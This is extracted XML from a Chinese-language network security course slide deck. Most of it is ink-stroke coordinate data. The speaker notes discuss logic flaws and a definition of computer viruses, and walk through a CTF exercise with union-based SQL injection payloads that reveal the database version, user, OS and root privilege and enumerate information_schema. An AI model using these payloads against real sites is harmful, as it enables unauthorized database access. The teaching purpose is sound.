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notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/ink/ink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ink/ink5.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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="306" r:id="rId4"/>
    <p:sldId id="964" r:id="rId5"/>
    <p:sldId id="308" r:id="rId6"/>
    <p:sldId id="969" r:id="rId7"/>
    <p:sldId id="966" r:id="rId8"/>
    <p:sldId id="968" r:id="rId9"/>
    <p:sldId id="967" r:id="rId10"/>
    <p:sldId id="446" r:id="rId11"/>
    <p:sldId id="970" r:id="rId12"/>
    <p:sldId id="971" r:id="rId13"/>
    <p:sldId id="972" r:id="rId14"/>
    <p:sldId id="973" r:id="rId15"/>
    <p:sldId id="974" r:id="rId16"/>
    <p:sldId id="309" r:id="rId17"/>
    <p:sldId id="988" r:id="rId18"/>
    <p:sldId id="989" r:id="rId19"/>
    <p:sldId id="307" r:id="rId20"/>
    <p:sldId id="258" r:id="rId21"/>
    <p:sldId id="278" r:id="rId22"/>
    <p:sldId id="963" r:id="rId23"/>
    <p:sldId id="322" r:id="rId24"/>
    <p:sldId id="558" r:id="rId25"/>
    <p:sldId id="557" r:id="rId26"/>
    <p:sldId id="260" r:id="rId27"/>
    <p:sldId id="261" r:id="rId28"/>
    <p:sldId id="324" r:id="rId29"/>
    <p:sldId id="386" r:id="rId30"/>
    <p:sldId id="387" r:id="rId31"/>
    <p:sldId id="388" r:id="rId32"/>
    <p:sldId id="439" r:id="rId33"/>
    <p:sldId id="440" r:id="rId34"/>
    <p:sldId id="321" r:id="rId35"/>
    <p:sldId id="560" r:id="rId36"/>
    <p:sldId id="975" r:id="rId37"/>
    <p:sldId id="561" r:id="rId38"/>
    <p:sldId id="562" r:id="rId39"/>
    <p:sldId id="441" r:id="rId40"/>
    <p:sldId id="804" r:id="rId41"/>
    <p:sldId id="443" r:id="rId42"/>
    <p:sldId id="444" r:id="rId43"/>
    <p:sldId id="340" r:id="rId44"/>
    <p:sldId id="572" r:id="rId45"/>
    <p:sldId id="573" r:id="rId46"/>
    <p:sldId id="574" r:id="rId47"/>
    <p:sldId id="575" r:id="rId48"/>
    <p:sldId id="576" r:id="rId49"/>
    <p:sldId id="577" r:id="rId50"/>
    <p:sldId id="578" r:id="rId51"/>
    <p:sldId id="579" r:id="rId52"/>
    <p:sldId id="580" r:id="rId53"/>
    <p:sldId id="445" r:id="rId54"/>
    <p:sldId id="976" r:id="rId55"/>
    <p:sldId id="315" r:id="rId56"/>
    <p:sldId id="336" r:id="rId57"/>
    <p:sldId id="977" r:id="rId58"/>
    <p:sldId id="978" r:id="rId59"/>
    <p:sldId id="990" r:id="rId60"/>
    <p:sldId id="337" r:id="rId61"/>
    <p:sldId id="979" r:id="rId62"/>
    <p:sldId id="333" r:id="rId63"/>
    <p:sldId id="339" r:id="rId64"/>
    <p:sldId id="447" r:id="rId65"/>
    <p:sldId id="316" r:id="rId66"/>
    <p:sldId id="741" r:id="rId67"/>
    <p:sldId id="317" r:id="rId68"/>
    <p:sldId id="559" r:id="rId69"/>
    <p:sldId id="742" r:id="rId70"/>
    <p:sldId id="745" r:id="rId71"/>
    <p:sldId id="743" r:id="rId72"/>
    <p:sldId id="750" r:id="rId73"/>
    <p:sldId id="744" r:id="rId74"/>
    <p:sldId id="749" r:id="rId75"/>
    <p:sldId id="746" r:id="rId76"/>
    <p:sldId id="279" r:id="rId77"/>
    <p:sldId id="980" r:id="rId78"/>
    <p:sldId id="981" r:id="rId79"/>
    <p:sldId id="982" r:id="rId80"/>
    <p:sldId id="347" r:id="rId81"/>
    <p:sldId id="348" r:id="rId82"/>
    <p:sldId id="983" r:id="rId83"/>
    <p:sldId id="350" r:id="rId84"/>
    <p:sldId id="984" r:id="rId85"/>
    <p:sldId id="962" r:id="rId86"/>
    <p:sldId id="311" r:id="rId87"/>
    <p:sldId id="266" r:id="rId88"/>
    <p:sldId id="986" r:id="rId89"/>
    <p:sldId id="303" r:id="rId90"/>
    <p:sldId id="262" r:id="rId91"/>
    <p:sldId id="985" r:id="rId92"/>
    <p:sldId id="453" r:id="rId93"/>
    <p:sldId id="284" r:id="rId94"/>
    <p:sldId id="299" r:id="rId95"/>
    <p:sldId id="885" r:id="rId96"/>
    <p:sldId id="886" r:id="rId97"/>
    <p:sldId id="452" r:id="rId98"/>
    <p:sldId id="454" r:id="rId99"/>
    <p:sldId id="455" r:id="rId100"/>
    <p:sldId id="300" r:id="rId101"/>
    <p:sldId id="304" r:id="rId102"/>
    <p:sldId id="305" r:id="rId103"/>
    <p:sldId id="457" r:id="rId104"/>
    <p:sldId id="460" r:id="rId105"/>
    <p:sldId id="458" r:id="rId106"/>
    <p:sldId id="459" r:id="rId107"/>
    <p:sldId id="461" r:id="rId108"/>
    <p:sldId id="739" r:id="rId109"/>
    <p:sldId id="927" r:id="rId110"/>
    <p:sldId id="961" r:id="rId111"/>
    <p:sldId id="456" r:id="rId112"/>
    <p:sldId id="273" r:id="rId113"/>
    <p:sldId id="272" r:id="rId114"/>
    <p:sldId id="448" r:id="rId115"/>
    <p:sldId id="319" r:id="rId116"/>
    <p:sldId id="280" r:id="rId117"/>
    <p:sldId id="987" r:id="rId118"/>
    <p:sldId id="341" r:id="rId119"/>
    <p:sldId id="353" r:id="rId120"/>
    <p:sldId id="282" r:id="rId121"/>
    <p:sldId id="354" r:id="rId122"/>
    <p:sldId id="342" r:id="rId123"/>
    <p:sldId id="351" r:id="rId124"/>
    <p:sldId id="343" r:id="rId125"/>
    <p:sldId id="352" r:id="rId126"/>
    <p:sldId id="283" r:id="rId127"/>
    <p:sldId id="566" r:id="rId128"/>
    <p:sldId id="567" r:id="rId129"/>
    <p:sldId id="570" r:id="rId130"/>
    <p:sldId id="569" r:id="rId131"/>
    <p:sldId id="568" r:id="rId132"/>
    <p:sldId id="737" r:id="rId133"/>
    <p:sldId id="736" r:id="rId134"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId1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16" autoAdjust="0"/>
    <p:restoredTop sz="80620" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="2128" y="184"/>
      </p:cViewPr>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15:13:56.241"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#A020F0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">12378 12687 14007,'5'3'0,"22"-1"4336,12-2-4336,-3 0 0,3 0 0,21 0 454,-22 0 1,-1 0-455,19 0 0,-18 0 0,3 0 0,13 0 0,2 0 0,-3 0 0,0 0-122,6 1 0,0-2 122,-15-1 0,-1-1 0,8 3 0,-1-1 0,-8-1 0,1-1 0,18 0 0,0 1 0,-23 2 0,1-1 1098,14-1 1,-1-1-1099,8 3 0,3 0 0,-23 0 0,5 0 775,-17 0-775,10 0 1713,-23 0-1713,7 0 882,-7 0-882,9 0 0,5 0 0,-1 0 0,6 0 0,-6 0 0,30 0 0,-11 0 0,8 0 0,2 0 0,-25 0 0,1 0 0,12 0 0,6 0 0,-6 0-1905,16 0 1905,-17 0 0,7 0 0,-9 0 0,5 0 0,-5-1 0,9-1 0,-7 0 0,17 1 0,-17-3 0,6-2 0,-3 1 0,2 1 0,-1 0 0,5-4 0,-2 0-303,-12 4 0,-3 1 303,24-6 0,-21 3 0,0 1 0,24-2 0,-18 0 0,-1 0 0,6 2 0,-16 0 0,1 0 0,17 0-54,-17 1 1,-2 1 53,5 2 0,11-3 0,-28 4 1832,12 0-1832,-18 0 664,5 0-664,-6 0 122,5 0-122,-8 0 0,4 0 0,-2 0 0,-3 0 0,8 0 0,-7 0 0,15 0 0,-5 0 0,29 0 0,-17 0 0,27 0 0,-22 0 0,-3 0 0,-8 0 0,-6 0 0,-5 0 0,2 0 0,-11 0 0,1 0 0,-2 0 0,6 0 0,-5 0 0,4 0 0,-3 0 0,-1 0 0,4 0 0,-4 0 0,1 0 0,-2 0 0,0 0 0,0 0 0,-1 3 0,1-1 0,-1 4 0,1-3 0,-1 0 0,-1-1 0,1-1 0,-2 2 0,0-1 0,2-1 0,-2 4 0,0-4 0,-1 1 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3642">12604 14372 15371,'22'3'0,"-6"0"1660,18-3 0,6 0-1660,10 0 0,-9 0 0,2 0 0,-8 0 0,1 0 0,21 0 0,1 0 0,-13 0 0,1 0 0,1 0 0,4 0 0,-5 0 0,-3 0 0,-1 0 0,19 0 0,-1 0 0,-21 0 0,-1 0 0,16 0 0,-3 0 0,9 0 0,3 0 0,-22 0 0,4-4 0,-8 3 1744,18-2-1744,-23 3 949,22 0-949,-26 0 2782,15 0-2782,-13 0 0,20-4 0,-6 3 0,8-7 0,-6 7 0,-4-7 0,-5 5 0,2 1 0,-6-3 0,3-1 0,4 1 0,5 0 0,-4-1 0,-7 1 0,0-1-372,16-2 0,-1 0 372,-15 3 0,-1 0 0,10-2 0,2-1 0,-4 2 0,1 0 0,12-4 0,-2 1 0,9-3 0,-12 3 0,-1 0 0,5-2 0,-18 6 0,-1 1 0,14-5 0,-17 4 0,1 1 0,20-3 0,-21 1 0,1 0 0,16 5 0,-1-8 0,-6 6 0,2 0 0,-13-2 0,3 0 0,7 1 0,6 1 0,-5-1 0,-5-2 0,-1 1-378,12-1 1,-2 2 377,16-2 0,-16-1 0,2 0 0,-12 5 0,1 1 0,25-6 0,-2 0 0,2 6 0,-12-3 0,-1 0 0,-1 3 0,-12-2 0,-2 1 0,-2 2 0,18 0 1107,-26 0-1107,17 0 0,-25 0 0,11 0 801,-15 0-801,14 0 0,-13 0 0,12 0 0,-9 0 0,22 0 0,-14 0 0,36 0 0,-26 0 0,3 2 0,0 0 0,4 3 0,11 0 0,-18 2 0,7-2 0,-8 0 0,12-1 0,-20-1 0,5-2 0,4 3 0,-7-4 0,18 0 0,-22 0 0,6 0 0,-14 0 0,5 0 0,-4 0 0,12 0 0,-12 0 0,12 0 0,-7 0 0,0 0 0,-2 0 0,2 0 0,-5 0 0,1 0 0,-3 0 0,-3 0 0,10 0 0,-5 0 0,11 0 0,-11 0 0,5 0 0,-6-3 0,10 2 0,-8-2 0,14 3 0,-15 0 0,4 0 0,-9 0 0,-1 0 0,-3 0 0,2 0 0,-1 0 0,4 0 0,-4 0 0,4 0 0,-4 0 0,7 0 0,-3 0 0,5 0 0,-2 0 0,6 0 0,-5 0 0,7 0 0,-11 0 0,4 0 0,-9 0 0,6 0 0,-1 0 0,5 0 0,-2 0 0,3 0 0,-7 0 0,3 0 0,-1 0 0,-1 0 0,7 0 0,-10 0 0,4 0 0,-6 0 0,2 0 0,-1 0 0,4 0 0,-7 2 0,4-1 0,-7 1 0,1-2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="9721">17558 11940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15:14:31.237"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#A020F0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">6326 17047 15153,'15'0'0,"1"-3"3991,25 2-3991,-9-3 0,1 0 0,0 0 0,13 2 0,-4-4 0,1 0 0,10 5 555,-19-1 0,1-1-555,12-1 0,17-1 0,-19 0 0,-8 3 0,-2 0 0,-2-1 986,26 2-986,-36-6 2856,15 6-2856,-24-2 0,15 0 0,-9 2 479,20-6-479,-9 2 0,14-3 0,-14 4 0,18-4 0,-22 4 0,12-1 0,-16-2 0,6 6 0,-8-2 0,5 0 0,-15 2 0,4-2 0,-8 3 0,1 0 0,-3 0 0,-4 0 0,-6 0 0,-2 0 0,-3 0 0,4 0 0,0-3 0,-4 3 0,6-3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15:17:06.083"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#A020F0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">23588 5924 24575,'53'0'0,"-4"0"0,-11 0 0,5 0 0,14 0 0,1 0-762,-9 0 0,1 0 762,7 0 0,6 0 0,-5 0 0,-4 0 0,1 0 0,-8 0 0,5 0 0,1 0 0,-2 0 0,6 0 0,-2 0 0,0 0 0,1 0 0,2 0 0,1 0 0,-6 0 0,4 0 0,-2 0 0,-4 0 0,-5 0 0,-3 0 0,1 0-811,10 0 1,1 0-1,-4 0 811,4 0 0,-3 0-237,-1 0 0,-1 0 237,-8 0 0,1 0 0,18-3 0,-1 1 0,-21 1 0,-1 1 0,5-3 0,-2 1-143,14 2 143,-8 0 627,-5 0-627,-1 0 2151,-1 0-2151,-9 0 1613,13 0-1613,-18 0 0,12 0 182,-13 0-182,23 0 0,-14 0 0,22-4 0,-20 3 0,10-8 0,17 8 0,-10-7 0,-8 7 0,0 1 0,9-9 0,-20 9 0,1-1 0,0-5 0,-1-1 0,19 5 0,-9-4 0,3-2 0,-9 3 0,0 0 0,10 1 0,2 0 0,-1-2 0,-1 0 0,-6 5 0,-1 1-425,-2-2 0,0 0 425,24 2 0,-8-2 0,2-1 0,-20 3 0,1-1 0,15-3 0,-1-1 0,9 4 0,-26-3 0,1 0 0,23 3 0,-16-4 0,-1 1 0,9 3 0,7-3 0,-12 4 0,-10 0 0,5-4 0,-12 3 0,15-3 0,-17 4 0,22 0 0,-23-3 0,7 2 850,-14-3-850,10 1 0,-9 2 0,5-3 0,-2 1 0,-4 2 0,10-2 0,-4 3 0,6 0 0,-12 0 0,1 0 0,-10 0 0,6 0 0,-9 0 0,11 0 0,-7 0 0,8 0 0,-5 0 0,2 0 0,2 0 0,18 0 0,-9 0 0,13 0 0,-21 0 0,13 0 0,-14 0 0,16 3 0,-19 0 0,1 1 0,-3-1 0,-6 0 0,2-2 0,-3 1 0,3 1 0,-3-2 0,6 4 0,-6-4 0,3 1 0,-6 1 0,-10-14 0,5 10 0,-7-10 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2050">15956 5922 11131,'4'-3'0,"10"0"4968,18 3-4968,15 0 0,6 0 0,-13 0 0,5 0-904,1 0 0,7 0 0,2 0 0,-4 0 904,-5 0 0,-3 1 0,3-2 0,0-1 0,4-2 0,0 0 0,-3 1 244,2 2 0,-3 1 0,0-2-244,-2-2 0,-1-1 0,1 2 0,2 2 0,1 2 0,-1-1 0,14-3 0,1 0 0,-12 2 0,3 1 0,-3-1 0,8-2 0,1 0 0,-7 3 0,4 0 0,-6 0 0,-3 0 0,-2 0 0,10 0 0,-3 0 0,5 0 2792,-1 0-2792,2 0 0,-17 0 0,3 0 0,-19 0 5900,5 4-5900,-9-4 2668,10 3-2668,-14-3 0,8 4 0,-10-3 0,9 2 0,-9-3 0,8 0 0,-1 3 0,-1-2 0,5 5 0,-13-3 0,4 1 0,-10 1 0,0-4 0,2 4 0,-2-4 0,-2 1 0,-14-2 0,-6 0 0,-9-6 0,1-3 0,-21-20 0,26 17 0,-13-9 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17895">8041 11430 24575,'9'-12'0,"0"1"0,0 5 0,0 0 0,1-1 0,5 1 0,-8 0 0,8-1 0,-8 4 0,4 0 0,-4 3 0,1 0 0,-2 0 0,0 0 0,0 0 0,-3 3 0,-1 0 0,1 3 0,-3 4 0,6 0 0,-5 4 0,8 5 0,-4 1 0,5 0 0,-3 3 0,0-9 0,4 19 0,-3-16 0,6 22 0,-9-23 0,4 5 0,-9-12 0,6 3 0,-5-5 0,5 3 0,-6-5 0,5-5 0,-2 3 0,3-3 0,0 0 0,2 0 0,2 0 0,9-9 0,0 3 0,23-24 0,-14 15 0,19-19 0,-16 11 0,0 0 0,0-2 0,9-12 0,-4 9 0,-2 0 0,-4-1 0,12-1 0,-22 18 0,-4-1 0,-6 9 0,-2-1 0,-1 4 0,1-2 0,-2 3 0,0 0 0,-1 0 0,1 0 0,-3 3 0,2 3 0,-4 0 0,1 5 0,-2-4 0,3 11 0,1-10 0,3 11 0,-1-12 0,0 8 0,0-7 0,3 7 0,-5-9 0,7 3 0,-10-3 0,7-3 0,-7 2 0,4-4 0,-4 4 0,4-4 0,-2 3 0,3-3 0,-3 4 0,2-5 0,-5 5 0,6-4 0,0 4 0,-3-2 0,5 0 0,-5 0 0,3-3 0,0 0 0,-1 0 0,1 0 0,10 0 0,5-4 0,5-4 0,13-6 0,-6-8 0,0 6 0,2-1 0,14-9 0,-6 2 0,0 3 0,3 3 0,-17 3 0,-1 0 0,2 3 0,4-4 0,-13 4 0,-1 5 0,-10 4 0,-4 0 0,2 2 0,-1-1 0,1 2 0,-2 0 0,-3 2 0,-1 4 0,-2 1 0,0 1 0,0 2 0,0-4 0,0 7 0,0-3 0,0 7 0,0-6 0,-6 7 0,2-7 0,-6 7 0,4-7 0,0 7 0,2-10 0,1 4 0,3-6 0,0 2 0,0-1 0,0 8 0,0-8 0,0 5 0,0-6 0,0 0 0,0 3 0,0-3 0,0 3 0,2-6 0,2-3 0,2-7 0,3-6 0,-2-1 0,16-9 0,5 0 0,11-6 0,2 6 0,1-1 0,-11 7 0,1-1 0,21-5-266,-21 5 1,-1 0 265,16-1 0,-1-2 0,-8 3 0,3 2 0,-22 5 0,0 7 0,-9 1 531,-1 3-531,-4 0 0,-1 3 0,-2 2 0,-2 7 0,0-2 0,0 5 0,-3-9 0,-6 10 0,1-9 0,-4 9 0,6-10 0,-4 19 0,3-11 0,-3 8 0,6-9 0,-2 0 0,6 1 0,-6 1 0,5-5 0,-1-1 0,2-3 0,0 0 0,0 0 0,0-1 0,2-2 0,1-3 0,3-3 0,10-10 0,1 1 0,29-11 0,-6 5 0,17 0 0,-9 0 0,6 7 0,-16-3 0,1 0 0,23 1-457,-24-1 1,-1 0 456,18 3 0,-23 1 0,1-2 0,25-4-117,-23 5 1,-3 0 116,2 1 0,6-1 0,-29 11 0,5-3 0,-10 3 902,-3 2-902,0 4 244,-3 0-244,0 2 0,-3-2 0,-3 3 0,-1-2 0,-5 7 0,6-6 0,-7 13 0,6-9 0,-3 8 0,6-7 0,-2 11 0,2-8 0,0 11 0,-2-13 0,5-1 0,-2-3 0,3-5 0,0 4 0,2-5 0,1 1 0,3-7 0,3-8 0,-2-1 0,5-8 0,-2 5 0,10-6 0,-5 6 0,19-7 0,-7 4 0,13-3 0,0-2 0,12-5 0,-8 3 0,-13 9 0,-2 2 0,-1-1 0,12-1 0,-24 7 0,1 4 0,-8 1 0,0 3 0,-5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15:21:06.077"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#A020F0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">13014 5030 24575,'15'0'0,"8"0"0,-2 0 0,12 0 0,2 0 0,23 0 0,-7 0 0,-8 0 0,-1 0 0,11 0 0,10 0 0,-17 0 0,12 0 0,-7 0 0,-9 0 0,1 0 0,10 0 0,-9 0 0,2 0 0,14 0-406,-25 0 1,0 0 405,26-5 0,-11 4 0,-12-1 0,0 0 0,15 2 0,-11 0 0,-1 0 0,4 0 0,-4-2 0,0-1 0,6-2 0,-2 0 0,0 0 0,15 0 0,-11 0 0,1 2 0,-16 2 0,0 0-638,16 0 0,0-2 638,-17 1 0,0 0 0,26-2 0,1 0 0,-20 1 0,1 0 0,6 0 0,5 0 0,-6 0 0,-12 0 0,0 1 0,16-3 0,0 0 0,0 0 0,6-4 0,-15 9 0,0-1 0,14-7-192,-20 7 0,0 1 192,11-9 0,12 4 0,-13-1 0,-6 0 0,0 0 0,6 0 0,13-4 0,-5 1 0,-10 4 0,12-1 0,-1-3 0,-19 6 0,1 1 0,24-4 0,-11 3 0,-1 2 0,0 1 0,-11 0 0,1 0 742,13 0-742,9 0 0,-11 0 0,-6 0 1301,-19 0-1301,9 0 0,-7 0 0,23 0 428,-22 0-428,12 0 0,-16 0 0,6 0 0,-5 0 0,4 0 0,11 0 0,-7 0 0,1 0 0,1 0 0,11 0 0,18 0 0,-15 0 0,0 0 0,-10 0 0,0 0 0,16 0-381,-16 0 0,0 0 381,17 0 0,-20 2 0,0 0 0,25-1 0,-14 3 0,-2 1 0,4-1-112,-14 1 0,-1 0 112,3 0 0,5 3 0,-7-7 0,-4 3 0,14 0 753,-22-3-753,22 2 233,-28-3-233,8 0 0,-10 0 0,-4 0 0,9 0 0,-11 0 0,8 0 0,-7 0 0,1 0 0,0 0 0,-2 0 0,-2 0 0,6 0 0,-5 0 0,4 0 0,-6 0 0,1 0 0,3 0 0,4 3 0,-2-2 0,7 2 0,-11 0 0,9-3 0,-10 3 0,4-3 0,-2 0 0,-1 0 0,1 0 0,4 0 0,3 0 0,17 0 0,-1 0 0,19 0 0,-13 0 0,-1 0 0,-9 0 0,-9 0 0,-3 0 0,-1 0 0,-7 0 0,-1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15:21:35.540"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#A020F0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">14984 5361 24575,'22'0'0,"-1"0"0,14 0 0,0 0 0,2 0 0,14 0 0,3-2 0,1-1 0,1 2-566,-14-1 0,0 0 566,14 2 0,-2-5 0,1 4 277,-6-3-277,-11 2 0,0 0 0,15 1 0,-11-4 0,1 1 0,8 3 0,6-3 0,-16 0 0,4 3 0,-13-3 0,12 0 0,-20 3 855,10-3-855,6 4 0,-3-4 0,18 3 0,-17-2 0,7 3 0,-11-4 0,1 3 0,-6-3 0,5 4 0,6 0 0,-3-4 0,18 3 0,-17-7 0,7 7 0,-11-3 0,22 0 0,-16 0 0,16-1 0,-21 1 0,-1 0 0,16 3 0,-11-3 0,-4 2 0,1 0 0,4 1 0,22-3 0,-26 4 0,10 0 0,-10 0 0,5 0 0,9 0 0,-12 0 0,23 0 0,-24 0 0,8 0 0,-11 0 0,17 0 0,-7 0 0,7 0 0,-4 0 0,-11 0 0,26 0 0,-23 0 0,0 2 0,0 0 0,1-1 0,15 3 0,-25-4 0,19 0 0,-16 0 0,0 0 0,0 0 0,5 0 0,23 0 0,-24 0 0,8 0 0,-16 0 0,10 0 0,-17 0 0,10 0 0,-13 0 0,0 0 0,9 0 0,-7 0 0,10 0 0,-7 0 0,-3 0 0,1 0 0,-3 0 0,9 0 0,-3 0 0,23 0 0,-14 0 0,4 0 0,1 0 0,8 0-259,-5 0 0,-1 0 259,5-4 0,1 4 0,1-1 0,9-7-608,-8 7 1,0 0 607,-15-1 0,-3 0 0,1 1 0,0 2-97,7-1 0,-3 0 97,7 0 0,-9 0 0,-3 0 0,-9 0 480,3 0-480,-12 0 1234,-7 0-1234,4 0 213,-1 0-213,4 0 0,1 0 0,9 0 0,-8 0 0,5 0 0,-7 0 0,13 0 0,-9 0 0,8 0 0,-14 0 0,1 2 0,-6-1 0,6 4 0,-6-4 0,0 4 0,-1-2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0308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16623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现在站点不像之前有什么注入、xss、SSRF、未授权漏洞等。都几乎没有这样的漏洞了，但是逻辑漏洞（其实在业务交互的地方这样的漏洞还是挺多的）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://www.freebuf.com/vuls/253833.html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https://www.cnblogs.com/csguo/p/7499171.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.jianshu.com/p/078df7a35671</a:t>
            </a:r>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B站数据库“脱裤”？如何让你的数据不“裸露”？</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https://www.cnblogs.com/csguo/p/7499171.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://www.jianshu.com/p/078df7a35671</a:t>
            </a:r>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https://wenku.baidu.com/view/784d218432d4b14e852458fb770bf78a64293a4d.html#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://max.book118.com/html/2017/0629/119037284.shtm恶意代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“计算机病毒之父”弗雷德•科恩给计算机病毒正名：“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>计算机病毒不是利用操作系统的错误或缺陷的程序，它是正常的用户程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"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https://mp.weixin.qq.com/s/Ihio6Hzjtrgn5LFJrUww4w</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https://mp.weixin.qq.com/s/Ihio6Hzjtrgn5LFJrUww4w</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https://blog.csdn.net/njc_sec/article/details/83662952</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https://blog.csdn.net/arbitraty/article/details/80202040</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>3） 判断数据库信息；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用内置函数暴数据库信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>version()版本；database()数据库；user()用户；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不用猜解可用字段暴数据库信息(有些网站不适用):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and 1=2 union all select version()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and 1=2 union all select database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and 1=2 union all select user()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作系统信息：and 1=2 union all select @@global.version_compile_os from mysql.user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库权限：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>and ord(mid(user(),1,1))=114 返回正常说明为root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>4） 查找数据库名；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息union select information_schema from information_schema.schemata （语句在显示位）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>该题看一下数据库信息，库名为skctf_flag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191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络安全攻防：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="191919"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
